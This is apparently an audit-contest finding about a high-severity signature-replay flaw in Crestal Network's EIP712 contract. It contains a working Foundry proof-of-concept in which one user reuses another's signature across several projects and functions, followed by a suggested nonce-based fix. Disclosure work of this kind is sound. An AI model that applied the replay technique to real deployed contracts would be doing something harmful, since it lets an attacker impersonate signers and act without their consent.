Stale Charcoal Walrus

High

# Attacker Can Replay Signatures

### Summary

The EIP712 contract's signature verification system lacks nonce tracking and proper signature binding, allowing signatures to be replayed across different functions and users. This vulnerability enables unauthorized actions using intercepted or reused signatures.

### Root Cause

In https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L19C5-L42C11 The `structHash` is missing the `nonce` parameter, and does not handle incrementing the nonce of the `msg.sender` to avoid replay of the signature

### Internal Pre-conditions

.

### External Pre-conditions

.

### Attack Path

1. Alice signs a message for with her private key
Message includes base64RecParam and serverURL
2. Bob observes the signature in Mempool/transaction
3. Bob retrieves Alice Signature on chain 
4. Bob can Create Any project and Deployment Proposal On behalf of Alice without Alice Consent.

### Impact

- Unauthorized project creation
- Identity impersonation
- Cross-function signature reuse
- No expiration of compromised signatures

### PoC

Create a file in the test called `Replay.t.sol`
paste in the coded POC below;
run `forge test --mt testSignatureReplayAttack -vvv` 

`//SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "forge-std/console.sol";
import "../src/BlueprintCore.sol";
import "../src/EIP712.sol";

contract ReplayAttackTest is Test {
    BlueprintCore public blueprint;
    address public alice = address(0x1);
    address public bob = address(0x2);

    function setUp() public {
        console.log("Deploying contracts...");
        blueprint = new BlueprintCore();
        vm.label(alice, "Alice");
        vm.label(bob, "Bob");

        // Give ETH to users
        vm.deal(alice, 100 ether);
        vm.deal(bob, 100 ether);
        console.log("Setup complete - Alice and Bob funded");
    }

    function testSignatureReplayAttack() public {
        console.log("Starting replay attack test...");

        // Generate unique projectIds
        bytes32 projectId1 = bytes32(uint256(1));
        bytes32 projectId2 = bytes32(uint256(2));
        bytes32 projectId3 = bytes32(uint256(3));
        string memory base64RecParam = "test_param";
        string memory serverURL = "https://test.com";

        console.log("Getting proposal digest...");
        bytes32 digest = blueprint.getRequestProposalDigest(projectId1, base64RecParam, serverURL);
        console.log("Digest created:", vm.toString(digest));

        // Alice signs the message
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(1, digest);
        bytes memory signature = abi.encodePacked(r, s, v);
        console.log("Signature created by Alice");

        // First use with projectId1
        console.log("\nAttempting first use of signature...");
        vm.prank(bob);
        bytes32 requestId1 =
            blueprint.createProjectIDAndProposalRequestWithSig(projectId1, base64RecParam, serverURL, signature);
        console.log("First use succeeded - Request ID:", vm.toString(requestId1));

        // Second use with projectId2
        console.log("\nAttempting signature replay with different projectId...");
        vm.prank(bob);
        bytes32 requestId2 =
            blueprint.createProjectIDAndProposalRequestWithSig(projectId2, base64RecParam, serverURL, signature);
        console.log("Replay succeeded - Request ID:", vm.toString(requestId2));

        // Cross-function replay with projectId3
        console.log("\nAttempting cross-function replay...");
        vm.prank(bob);
        bytes32 requestId3 =
            blueprint.createProjectIDAndDeploymentRequestWithSig(projectId3, base64RecParam, serverURL, signature);
        console.log("Cross-function replay succeeded - Request ID:", vm.toString(requestId3));

        // Verify different request IDs
        assertTrue(requestId1 != requestId2, "Request IDs should be different");
        assertTrue(requestId2 != requestId3, "Request IDs should be different");
    }

    function testSignatureReplayAcrossUsers() public {
        console.log("\nTesting signature replay across users...");

        bytes32 projectId = bytes32(uint256(1));
        string memory base64RecParam = "test_param";
        string memory serverURL = "https://test.com";

        bytes32 digest = blueprint.getRequestProposalDigest(projectId, base64RecParam, serverURL);

        // Alice signs
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(1, digest);
        bytes memory signature = abi.encodePacked(r, s, v);
        console.log("Alice created signature");

        // Bob uses Alice's signature
        vm.prank(bob);
        bytes32 requestId =
            blueprint.createProjectIDAndProposalRequestWithSig(projectId, base64RecParam, serverURL, signature);
        console.log("Bob used Alice's signature successfully");
        console.log("Request ID:", vm.toString(requestId));
    }
}
`

### Mitigation

Add nonce tracking:

`contract EIP712 is EIP712Upgradeable {
    mapping(address => uint256) public nonces;
    
    bytes32 public constant PROPOSAL_REQUEST_TYPEHASH =
        keccak256("ProposalRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce)");
    
    function getRequestProposalDigest(
        bytes32 projectId,
        string memory base64RecParam,
        string memory serverURL
    ) public returns (bytes32) {
        bytes32 structHash = keccak256(
            abi.encode(
                PROPOSAL_REQUEST_TYPEHASH,
                projectId,
                keccak256(bytes(base64RecParam)),
                keccak256(bytes(serverURL)),
                nonces[msg.sender]++
            )
        );
        return _hashTypedDataV4(structHash);
    }
}`